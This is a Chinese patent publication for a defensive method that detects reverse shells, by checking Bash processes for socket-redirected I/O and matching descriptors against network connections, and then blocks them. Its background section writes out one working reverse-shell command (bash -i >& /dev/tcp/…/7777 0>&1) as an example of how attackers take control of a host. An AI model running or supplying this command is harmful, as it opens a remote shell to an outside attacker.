CN110166420A - 反弹shell阻断方法及装置 - Google Patents
反弹shell阻断方法及装置 Download PDFInfo
- Publication number
- CN110166420A CN110166420A CN201910245774.3A CN201910245774A CN110166420A CN 110166420 A CN110166420 A CN 110166420A CN 201910245774 A CN201910245774 A CN 201910245774A CN 110166420 A CN110166420 A CN 110166420A
- Authority
- CN
- China
- Prior art keywords
- bash
- file
- bash process
- network connection
- rebound
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/16—Implementing security features at a particular protocol layer
- H04L63/168—Implementing security features at a particular protocol layer above the transport layer
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- Computer Hardware Design (AREA)
- Signal Processing (AREA)
- Computer Networks & Wireless Communication (AREA)
- Computing Systems (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Information Transfer Between Computers (AREA)
Abstract
本发明公开了一种反弹shell阻断方法及装置。其中,反弹shell阻断方法包括:监听Bash进程创建事件;当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;若是,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;若是,则确认服务器存在反弹shell攻击,两者结合提高了反弹shell检测的准确性,获取反弹shell网络连接的IP地址及端口号;对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理,通过屏蔽IP地址及端口号并杀死当前Bash进程,可以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为,避免安全事件的发生。
Description
技术领域
本发明涉及计算机技术领域,具体涉及一种反弹shell阻断方法及装置。
背景技术
现有的网络攻击一般是网站攻击者利用网站存在的漏洞,对网站服务器进行攻击,从而导致安全事件频发,这种攻击不仅对企业形象造成影响还会产生经济损失。其中,通过Webshell入侵网站是攻击者常用的攻击手段。Web攻击者拿到Web服务器的Webshell后需要提权,提权需要一个可交互的运行环境,因此攻击者需要先反弹一个可交互的shell,然后在命令行终端执行相关命令进行权限提取等操作。一旦攻击者成功通过反弹shell的交互环境获取到服务器的最高权限后,可继续利用该交互环境对服务器进行其他的攻击和漏洞利用。如果能及时发现某台服务器存在反弹shell,并采取相关措施关闭检测到的反弹shell连接,可在第一时间终止攻击者对Web服务器的攻击。
现有的Webshell检测技术,重点关注如何查杀后门脚本文件即对Webshell脚本文件的查杀。在反弹shell检测方面,现有的专利“201710540141.6一种检测和防范反弹shell的方法和系统”通过捕获执行shell程序的动作,判断shell进程是否带终端属性判断该shell程序是否为反弹shell。如果是反弹shell,则向反弹shell进程发出终止信号,杀死进程。
这种根据shell程序运行时进程是否有终端属性来判断该程序是否为反弹shell,判断方式太过单一,存在较高的误报率。
发明内容
鉴于上述问题,提出了本发明以便提供一种克服上述问题或者至少部分地解决上述问题的反弹shell阻断方法及装置。
根据本发明的一个方面,提供了一种反弹shell阻断方法,包括:
监听Bash进程创建事件;
当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
若是,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
若是,则获取反弹shell网络连接的IP地址及端口号;
对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。
根据本发明的另一方面,提供了一种反弹shell阻断装置,包括:
监听模块,适于监听Bash进程创建事件;
第一判断模块,适于当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
第二判断模块,适于若Bash进程对应的重定向文件为套接字文件,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
获取模块,适于若根据套接字文件描述符判断存在反弹shell网络连接,则获取反弹shell网络连接的IP地址及端口号;
处理模块,适于对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。
根据本发明的又一方面,提供了一种计算设备,包括:处理器、存储器、通信接口和通信总线,处理器、存储器和通信接口通过通信总线完成相互间的通信;
存储器用于存放至少一可执行指令,可执行指令使处理器执行上述反弹shell阻断方法对应的操作。
根据本发明的再一方面,提供了一种计算机存储介质,存储介质中存储有至少一可执行指令,可执行指令使处理器执行如上述反弹shell阻断方法对应的操作。
根据本发明提供的方案,监听Bash进程创建事件;当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;若是,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;若是,则获取反弹shell网络连接的IP地址及端口号;对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。基于本发明提供的方案,通过判断Bash进程对应的重定向文件是否为套接字文件,若是,则根据该套接字文件描述符确定是否存在反弹shell网络连接,由此确认服务器存在反弹shell攻击,两者结合提高了反弹shell检测的准确性,通过屏蔽IP地址及端口号并杀死当前Bash进程,可以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为,避免安全事件的发生。
上述说明仅是本发明技术方案的概述,为了能够更清楚了解本发明的技术手段,而可依照说明书的内容予以实施,并且为了让本发明的上述和其它目的、特征和优点能够更明显易懂,以下特举本发明的具体实施方式。
附图说明
通过阅读下文优选实施方式的详细描述,各种其他的优点和益处对于本领域普通技术人员将变得清楚明了。附图仅用于示出优选实施方式的目的,而并不认为是对本发明的限制。而且在整个附图中,用相同的参考符号表示相同的部件。在附图中:
图1为反弹shell示意图;
图2示出了根据本发明一个实施例的反弹shell阻断方法的流程示意图;
图3示出了根据本发明另一个实施例的反弹shell阻断方法的流程示意图;
图4示出了根据本发明一个实施例的反弹shell阻断装置的结构示意图;
图5示出了根据本发明一个实施例的计算设备的结构示意图。
具体实施方式
下面将参照附图更详细地描述本公开的示例性实施例。虽然附图中显示了本公开的示例性实施例,然而应当理解,可以以各种形式实现本公开而不应被这里阐述的实施例所限制。相反,提供这些实施例是为了能够更透彻地理解本公开,并且能够将本公开的范围完整的传达给本领域的技术人员。
图1为反弹shell示意图,在图1所示场景中,目标主机为一个内网主机,没有公网IP地址,攻击者无法从外网发起对目标主机的远程连接,为了获得方便直接操作目标主机的交互环境,就需要对目标主机进行提权操作。攻击者使用获取的Webshell执行bash命令:bash-i>&/dev/tcp/119.119.119.119/7777 0>&1,运行该命令后由目标主机主动发起一个反弹的shell到外网攻击者机器119.119.119.119,获取目标主机的shell终端控制环境。针对这种情况,就需要及时且准确地阻断反弹shell,防止攻击者对目标主机的攻击。
为了能够实现及时且准确地阻断反弹shell,使得目标主机免受攻击者的攻击,本发明发明人提出了一种能够及时阻断反弹shell的方法及装置。下面结合具体实施例进行说明。
图2示出了根据本发明一个实施例的反弹shell阻断方法的流程示意图。如图2所示,该方法包括以下步骤:
步骤S200,监听Bash进程创建事件。
为了能够及时对反弹shell进行阻断,需要及时发现Bash进程是否创建,具体地,可以采用以下方法确定是否创建了Bash进程:对Bash进程创建事件进行监听,例如,通过循环遍历/proc文件的方式。在本实施例中,监听Bash进程创建事件以及时发现创建的Bash进程,为阻断反弹shell提供了检测基础。
步骤S201,当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件,若是,则执行步骤S202。
正常情况下,Bash进程会定向到终端设备文件中,例如,/dev/pts/0文件、/dev/pts/1文件。若攻击者通过Bash进程进行反弹shell,通常采用重定向技术,重定向到套接字文件中。
为了能够准确地阻断反弹shell,且进一步提升阻断地准确率,避免出现错误阻断的情况,在监听到Bash进程创建后,需要做进一步的判断,具体地,判断Bash进程对应的重定向文件是否为套接字文件。
步骤S202,确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接。
在判断出Bash进程对应的重定向文件为套接字文件的情况下,可以确定该Bash进程为反弹shell进程,该Bash进程主动创建一个对外的连接。但是可能存在该进程并未成功发起对应的网络连接,或者对应的网络连接已经断开的情况,因此,需要判断是否存在反弹shell网络连接。
套接字文件对应有相应的套接字文件描述符,这里以FD标记套接字文件描述符,通常情况下,每条网络连接都对应一FD值,因此,可以根据套接字文件描述符FD判断是否存在反弹shell网络连接。
步骤S203,获取反弹shell网络连接的IP地址及端口号。
在根据套接字文件确定存在反弹shell网络连接的情况下,可以根据套接字文件描述符FD获取到反弹shell网络连接的IP地址及端口号。
步骤S204,对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。
IP地址和端口号是攻击者实现对目标主机进行漏洞攻击的关键,对IP地址及端口号进行屏蔽处理,可以实现拦截IP地址及端口号的出口流量,避免出口流量被输出至目标主机,从而彻底阻止攻击者对反弹shell的利用。
对Bash进程进行阻断,可以中断当前攻击者利用的网络连接。
根据本发明上述实施例提供的方法,监听Bash进程创建事件;当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;若是,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;若是,则获取反弹shell网络连接的IP地址及端口号;对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。基于本发明提供的方案,通过判断Bash进程对应的重定向文件是否为套接字文件,若是,则根据该套接字文件描述符确定是否存在反弹shell网络连接,由此确认服务器存在反弹shell攻击,两者结合提高了反弹shell检测的准确性,通过屏蔽IP地址及端口号并杀死当前Bash进程,可以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为,避免安全事件的发生。
图3示出了根据本发明另一个实施例的反弹shell阻断方法的流程示意图。如图3所示,该方法包括以下步骤:
步骤S300,通过内核提供的订阅机制订阅Bash进程的创建通知消息。
通过遍历/proc文件的方式监听Bash进程,很容易出现,循环遍历/proc文件的频率过高,则会增加服务器系统的运行负载,如果循环遍历/proc文件的频率太低则可能会漏掉运行时间较短的Bash进程的情况出现,很容易出现不能及时地阻断反弹shell,导致攻击者成功通过反弹shell进行提权,进行了相应地攻击。
为了能够准确且及时的阻断反弹shell,需要及时发现Bash进程创建,因此,本实施例不再采用循环遍历/proc文件的方式发现Bash进程的创建,而是通过订阅方式及时发现Bash进程的创建,具体地,通过内核提供的订阅机制订阅Bash进程的创建通知消息。内核能够捕获到进程创建,并生成创建通知消息,反弹shell阻断装置通过订阅该创建通知消息,获知创建了Bash进程。
步骤S301,当接收到创建通知消息时,根据Bash进程的进程标识查找Bash进程对应的重定向文件。
在接收到创建通知消息时,可以确定创建了Bash进程,为了能够准确且及时的进行反弹shell的阻断,需要对Bash进程做进一步的判断,判断Bash进程是否为反弹shell进程,具体地,可以根据步骤S301-步骤S303中的方法确定Bash进程是否为反弹shell进程。
在确定创建了Bash进程后,获取到Bash进程的进程信息,例如,进程标识PID,在获取到进程标识后,可以根据Bash进程的进程标识查找Bash进程对应的重定向文件,例如,通过进程标识匹配的方式,确定Bash进程对应的重定向文件,其中,Bash进程对应的重定向文件为Bash进程的标准输入输出及标准错误输出对应的重定向文件。
步骤S302,判断Bash进程对应的重定向文件的命名格式是否为预设命名格式,若是,则执行步骤S303;若否,则执行步骤S309。
通常情况下,套接字文件具有固定的命名格式,例如,携带有字符“socket”,这里仅是举例说明,这样,可以通过判断Bash进程对应的重定向文件的命名格式是否为预设命名格式,来确定Bash进程对应的重定向文件是否为套接字文件。
步骤S303,确定Bash进程对应的重定向文件为套接字文件,确定Bash进程为反弹shell进程。
在判断出Bash进程对应的重定向文件的命名格式为预设命名格式的情况下,可以确定Bash进程对应的重定向文件为套接字文件,从而确定Bash进程为反弹shell进程。
步骤S304,获取Bash进程对应的重定向文件的套接字文件描述符。
在确定了Bash进程对应的重定向文件为套接字文件的情况下,可以根据Bash进程的进程标识获取Bash进程对应的重定向文件的套接字文件描述符,例如,根据进程标识查找/proc/PID/FD文件,得到Bash进程对应的重定向文件的套接字文件描述符。
步骤S305,判断所有网络连接中是否存在任一网络连接的套接字文件描述符与Bash进程对应的重定向文件的套接字文件描述符相匹配,若是,则执行步骤S306;若否,则执行步骤S308。
反弹shell阻断装置能够获取到所有网络连接的连接信息,其中,每一条网络连接都对应一FD值,因此,可以将Bash进程对应的重定向文件的FD与/proc/net/tcp中所有网络连接的FD比较,以确定所有网络连接中是否存在任一网络连接的FD与Bash进程对应的重定向文件的FD相匹配,若存在与Bash进程对应的重定向文件的FD相同的网络连接,则可以确定该网络连接为反弹shell网络连接;若不存在与Bash进程对应的重定向文件的FD相同的网络连接,可以确定该Bash进程并未成功发起对应的网络连接,或者对应的网络连接已经断开。
步骤S306,确定该网络连接为反弹shell网络连接,并根据套接字文件描述符获取该网络连接的IP地址及端口号。
在判断出所有网络连接中存在任一网络连接的套接字文件描述符与Bash进程对应的重定向文件的套接字文件描述符相匹配的情况下,可以确定该网络连接为反弹shell网络连接,从而可以根据套接字文件描述符获取该网络连接的IP地址及端口号,例如,根据套接字文件描述符从网络连接中的预设字段(如rem_address字段)中获取到IP地址及端口号。
步骤S307,对IP地址及端口号进行屏蔽处理。
IP地址和端口号是攻击者实现对目标主机进行漏洞攻击的关键,对IP地址及端口号进行屏蔽处理,可以实现拦截IP地址及端口号的出口流量,避免出口流量被输出至目标主机,从而彻底阻止攻击者对反弹shell的利用。
步骤S308,对Bash进程进行阻断处理。
在确定该网络连接为反弹shell网络连接的情况下,不仅需要对IP地址及端口号进行屏蔽处理,还需要对Bash进程进行阻断,可以中断当前攻击者利用的网络连接。
在判断出所有网络连接中不存在任一网络连接的套接字文件描述符与Bash进程对应的重定向文件的套接字文件描述符相匹配的情况下,则直接对Bash进程进行阻断处理。
步骤S309,确定Bash进程对应的重定向文件为终端设备文件,则方法结束。
在Bash进程对应的重定向文件的命名格式不是预设命名格式的情况下,可以确定Bash进程对应的重定向文件为终端设备文件,Bash进程是正常进程,则方法结束。
根据本发明上述实施例提供的方法,通过订阅创建通知消息,可以及时准确地确定创建了Bash进程,从而能够及时地阻断反弹shell,防止攻击者进行攻击,解决了现有技术中由于bash进程创建不能被及时发现,导致攻击者可以成功通过反弹shell进行提权的问题。通过判断Bash进程对应的重定向文件是否为套接字文件,若是,则根据该套接字文件描述符确定是否存在反弹shell网络连接,由此确认服务器存在反弹shell攻击,两者结合提高了反弹shell检测的准确性,通过屏蔽IP地址及端口号并杀死当前Bash进程,可以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为,避免安全事件的发生。
图4示出了根据本发明一个实施例的反弹shell阻断装置的结构示意图。如图4所示,该装置包括:监听模块400、第一判断模块401、第二判断模块402、获取模块403、处理模块404。
监听模块400,适于监听Bash进程创建事件;
第一判断模块401,适于当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
第二判断模块402,适于若Bash进程对应的重定向文件为套接字文件,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
获取模块403,适于若根据套接字文件描述符判断存在反弹shell网络连接,则获取反弹shell网络连接的IP地址及端口号;
处理模块404,适于对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。
可选地,第二判断模块402进一步适于:获取Bash进程对应的重定向文件的套接字文件描述符;
判断所有网络连接中是否存在任一网络连接的套接字文件描述符与Bash进程对应的重定向文件的套接字文件描述符相匹配;
若是,则确定该网络连接为反弹shell网络连接。
可选地,处理模块404还适于:若所有网络连接中任一网络连接的套接字文件描述符与Bash进程对应的重定向文件的套接字文件描述符均不匹配,则对Bash进程进行阻断处理。
可选地,监听模块400进一步适于:通过内核提供的订阅机制订阅Bash进程的创建通知消息。
可选地,第一判断模块401进一步适于:根据Bash进程的进程标识查找Bash进程对应的重定向文件;
判断Bash进程对应的重定向文件的命名格式是否为预设命名格式;
若是,则确定Bash进程对应的重定向文件为套接字文件。
可选地,Bash进程对应的重定向文件为Bash进程的标准输入输出及标准错误输出对应的重定向文件。
根据本发明上述实施例提供的装置,监听Bash进程创建事件;当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;若是,则确定Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;若是,则获取反弹shell网络连接的IP地址及端口号;对IP地址及端口号进行屏蔽处理,以及对Bash进程进行阻断处理。基于本发明提供的方案,通过判断Bash进程对应的重定向文件是否为套接字文件,若是,则根据该套接字文件描述符确定是否存在反弹shell网络连接,由此确认服务器存在反弹shell攻击,两者结合提高了反弹shell检测的准确性,通过屏蔽IP地址及端口号并杀死当前Bash进程,可以及时终止攻击者想要通过反弹shell进行权限提取及漏洞执行的行为,避免安全事件的发生。
本申请实施例还提供了一种非易失性计算机存储介质,所述计算机存储介质存储有至少一可执行指令,该计算机可执行指令可执行上述任意方法实施例中的反弹shell阻断方法。
图5示出了根据本发明一个实施例的计算设备的结构示意图,本发明具体实施例并不对计算设备的具体实现做限定。
如图5所示,该计算设备可以包括:处理器(processor)502、通信接口(Communications Interface)504、存储器(memory)506、以及通信总线508。
其中:
处理器502、通信接口504、以及存储器506通过通信总线508完成相互间的通信。
通信接口504,用于与其它设备比如客户端或其它服务器等的网元通信。
处理器502,用于执行程序510,具体可以执行上述反弹shell阻断方法实施例中的相关步骤。
具体地,程序510可以包括程序代码,该程序代码包括计算机操作指令。
处理器502可能是中央处理器CPU,或者是特定集成电路ASIC(ApplicationSpecific Integrated Circuit),或者是被配置成实施本发明实施例的一个或多个集成电路。计算设备包括的一个或多个处理器,可以是同一类型的处理器,如一个或多个CPU;也可以是不同类型的处理器,如一个或多个CPU以及一个或多个ASIC。
存储器506,用于存放程序510。存储器506可能包含高速RAM存储器,也可能还包括非易失性存储器(non-volatile memory),例如至少一个磁盘存储器。
程序510具体可以用于使得处理器502执行上述任意方法实施例中的反弹shell阻断方法。程序510中各步骤的具体实现可以参见上述反弹shell阻断实施例中的相应步骤和单元中对应的描述,在此不赘述。所属领域的技术人员可以清楚地了解到,为描述的方便和简洁,上述描述的设备和模块的具体工作过程,可以参考前述方法实施例中的对应过程描述,在此不再赘述。
在此提供的算法和显示不与任何特定计算机、虚拟系统或者其它设备固有相关。各种通用系统也可以与基于在此的示教一起使用。根据上面的描述,构造这类系统所要求的结构是显而易见的。此外,本发明也不针对任何特定编程语言。应当明白,可以利用各种编程语言实现在此描述的本发明的内容,并且上面对特定语言所做的描述是为了披露本发明的最佳实施方式。
在此处所提供的说明书中,说明了大量具体细节。然而,能够理解,本发明的实施例可以在没有这些具体细节的情况下实践。在一些实例中,并未详细示出公知的方法、结构和技术,以便不模糊对本说明书的理解。
类似地,应当理解,为了精简本公开并帮助理解各个发明方面中的一个或多个,在上面对本发明的示例性实施例的描述中,本发明的各个特征有时被一起分组到单个实施例、图、或者对其的描述中。然而,并不应将该公开的方法解释成反映如下意图:即所要求保护的本发明要求比在每个权利要求中所明确记载的特征更多的特征。更确切地说,如下面的权利要求书所反映的那样,发明方面在于少于前面公开的单个实施例的所有特征。因此,遵循具体实施方式的权利要求书由此明确地并入该具体实施方式,其中每个权利要求本身都作为本发明的单独实施例。
本领域那些技术人员可以理解,可以对实施例中的设备中的模块进行自适应性地改变并且把它们设置在与该实施例不同的一个或多个设备中。可以把实施例中的模块或单元或组件组合成一个模块或单元或组件,以及此外可以把它们分成多个子模块或子单元或子组件。除了这样的特征和/或过程或者单元中的至少一些是相互排斥之外,可以采用任何组合对本说明书(包括伴随的权利要求、摘要和附图)中公开的所有特征以及如此公开的任何方法或者设备的所有过程或单元进行组合。除非另外明确陈述,本说明书(包括伴随的权利要求、摘要和附图)中公开的每个特征可以由提供相同、等同或相似目的的替代特征来代替。
此外,本领域的技术人员能够理解,尽管在此所述的一些实施例包括其它实施例中所包括的某些特征而不是其它特征,但是不同实施例的特征的组合意味着处于本发明的范围之内并且形成不同的实施例。例如,在下面的权利要求书中,所要求保护的实施例的任意之一都可以以任意的组合方式来使用。
应该注意的是上述实施例对本发明进行说明而不是对本发明进行限制,并且本领域技术人员在不脱离所附权利要求的范围的情况下可设计出替换实施例。在权利要求中,不应将位于括号之间的任何参考符号构造成对权利要求的限制。单词“包含”不排除存在未列在权利要求中的元件或步骤。位于元件之前的单词“一”或“一个”不排除存在多个这样的元件。本发明可以借助于包括有若干不同元件的硬件以及借助于适当编程的计算机来实现。在列举了若干装置的单元权利要求中,这些装置中的若干个可以是通过同一个硬件项来具体体现。单词第一、第二、以及第三等的使用不表示任何顺序。可将这些单词解释为名称。
本发明公开了:A1.一种反弹shell阻断方法,包括:
监听Bash进程创建事件;
当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
若是,则确定所述Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
若是,则获取反弹shell网络连接的IP地址及端口号;
对IP地址及端口号进行屏蔽处理,以及对所述Bash进程进行阻断处理。
A2.根据A1所述的方法,其中,所述根据套接字文件描述符判断是否存在反弹shell网络连接进一步包括:
获取所述Bash进程对应的重定向文件的套接字文件描述符;
判断所有网络连接中是否存在任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符相匹配;
若是,则确定该网络连接为反弹shell网络连接。
A3.根据A2所述的方法,其中,所述方法还包括:若所有网络连接中任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符均不匹配,则对所述Bash进程进行阻断处理。
A4.根据A1-A3中任一项所述的方法,其中,所述监听Bash进程创建事件进一步包括:
通过内核提供的订阅机制订阅Bash进程的创建通知消息。
A5.根据A1-A3中任一项所述的方法,其中,所述判断Bash进程对应的重定向文件是否为套接字文件进一步包括:
根据所述Bash进程的进程标识查找Bash进程对应的重定向文件;
判断所述Bash进程对应的重定向文件的命名格式是否为预设命名格式;
若是,则确定所述Bash进程对应的重定向文件为套接字文件。
A6.根据A1-A3中任一项所述的方法,其中,所述Bash进程对应的重定向文件为Bash进程的标准输入输出及标准错误输出对应的重定向文件。
B7.一种反弹shell阻断装置,包括:
监听模块,适于监听Bash进程创建事件;
第一判断模块,适于当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
第二判断模块,适于若Bash进程对应的重定向文件为套接字文件,则确定所述Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
获取模块,适于若根据套接字文件描述符判断存在反弹shell网络连接,则获取反弹shell网络连接的IP地址及端口号;
处理模块,适于对IP地址及端口号进行屏蔽处理,以及对所述Bash进程进行阻断处理。
B8.根据B7所述的装置,其中,所述第二判断模块进一步适于:
获取所述Bash进程对应的重定向文件的套接字文件描述符;
判断所有网络连接中是否存在任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符相匹配;
若是,则确定该网络连接为反弹shell网络连接。
B9.根据B8所述的装置,其中,所述处理模块还适于:若所有网络连接中任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符均不匹配,则对所述Bash进程进行阻断处理。
B10.根据B7-B9中任一项所述的装置,其中,所述监听模块进一步适于:通过内核提供的订阅机制订阅Bash进程的创建通知消息。
B11.根据B7-B9中任一项所述的装置,其中,所述第一判断模块进一步适于:根据所述Bash进程的进程标识查找Bash进程对应的重定向文件;
判断所述Bash进程对应的重定向文件的命名格式是否为预设命名格式;
若是,则确定所述Bash进程对应的重定向文件为套接字文件。
B12.根据B7-B9中任一项所述的装置,其中,所述Bash进程对应的重定向文件为Bash进程的标准输入输出及标准错误输出对应的重定向文件。
C13.一种计算设备,包括:处理器、存储器、通信接口和通信总线,所述处理器、所述存储器和所述通信接口通过所述通信总线完成相互间的通信;
所述存储器用于存放至少一可执行指令,所述可执行指令使所述处理器执行如A1-A6中任一项所述的反弹shell阻断方法对应的操作。
D14.一种计算机存储介质,所述存储介质中存储有至少一可执行指令,所述可执行指令使处理器执行如A1-A6中任一项所述的反弹shell阻断方法对应的操作。
Claims (10)
1.一种反弹shell阻断方法,包括:
监听Bash进程创建事件;
当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
若是,则确定所述Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
若是,则获取反弹shell网络连接的IP地址及端口号;
对IP地址及端口号进行屏蔽处理,以及对所述Bash进程进行阻断处理。
2.根据权利要求1所述的方法,其中,所述根据套接字文件描述符判断是否存在反弹shell网络连接进一步包括:
获取所述Bash进程对应的重定向文件的套接字文件描述符;
判断所有网络连接中是否存在任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符相匹配;
若是,则确定该网络连接为反弹shell网络连接。
3.根据权利要求2所述的方法,其中,所述方法还包括:若所有网络连接中任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符均不匹配,则对所述Bash进程进行阻断处理。
4.根据权利要求1-3中任一项所述的方法,其中,所述监听Bash进程创建事件进一步包括:
通过内核提供的订阅机制订阅Bash进程的创建通知消息。
5.根据权利要求1-3中任一项所述的方法,其中,所述判断Bash进程对应的重定向文件是否为套接字文件进一步包括:
根据所述Bash进程的进程标识查找Bash进程对应的重定向文件;
判断所述Bash进程对应的重定向文件的命名格式是否为预设命名格式;
若是,则确定所述Bash进程对应的重定向文件为套接字文件。
6.根据权利要求1-3中任一项所述的方法,其中,所述Bash进程对应的重定向文件为Bash进程的标准输入输出及标准错误输出对应的重定向文件。
7.一种反弹shell阻断装置,包括:
监听模块,适于监听Bash进程创建事件;
第一判断模块,适于当监听到Bash进程创建时,判断Bash进程对应的重定向文件是否为套接字文件;
第二判断模块,适于若Bash进程对应的重定向文件为套接字文件,则确定所述Bash进程为反弹shell进程,根据套接字文件描述符判断是否存在反弹shell网络连接;
获取模块,适于若根据套接字文件描述符判断存在反弹shell网络连接,则获取反弹shell网络连接的IP地址及端口号;
处理模块,适于对IP地址及端口号进行屏蔽处理,以及对所述Bash进程进行阻断处理。
8.根据权利要求7所述的装置,其中,所述第二判断模块进一步适于:
获取所述Bash进程对应的重定向文件的套接字文件描述符;
判断所有网络连接中是否存在任一网络连接的套接字文件描述符与所述Bash进程对应的重定向文件的套接字文件描述符相匹配;
若是,则确定该网络连接为反弹shell网络连接。
9.一种计算设备,包括:处理器、存储器、通信接口和通信总线,所述处理器、所述存储器和所述通信接口通过所述通信总线完成相互间的通信;
所述存储器用于存放至少一可执行指令,所述可执行指令使所述处理器执行如权利要求1-6中任一项所述的反弹shell阻断方法对应的操作。
10.一种计算机存储介质,所述存储介质中存储有至少一可执行指令,所述可执行指令使处理器执行如权利要求1-6中任一项所述的反弹shell阻断方法对应的操作。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910245774.3A CN110166420A (zh) | 2019-03-28 | 2019-03-28 | 反弹shell阻断方法及装置 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910245774.3A CN110166420A (zh) | 2019-03-28 | 2019-03-28 | 反弹shell阻断方法及装置 |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN110166420A true CN110166420A (zh) | 2019-08-23 |
Family
ID=67638497
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201910245774.3A Pending CN110166420A (zh) | 2019-03-28 | 2019-03-28 | 反弹shell阻断方法及装置 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110166420A (zh) |
Cited By (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN113139193A (zh) * | 2021-04-23 | 2021-07-20 | 杭州安恒信息技术股份有限公司 | 一种反弹shell风险判定方法、装置和系统 |
| CN113449298A (zh) * | 2020-03-24 | 2021-09-28 | 百度在线网络技术(北京)有限公司 | 一种反弹shell进程的检测方法、装置、设备和介质 |
| CN113515743A (zh) * | 2021-03-23 | 2021-10-19 | 杭州安恒信息技术股份有限公司 | 反弹shell进程调用链的识别方法、装置和电子装置 |
| CN113761527A (zh) * | 2020-07-01 | 2021-12-07 | 北京沃东天骏信息技术有限公司 | 一种反弹shell进程检测方法、装置、设备及存储介质 |
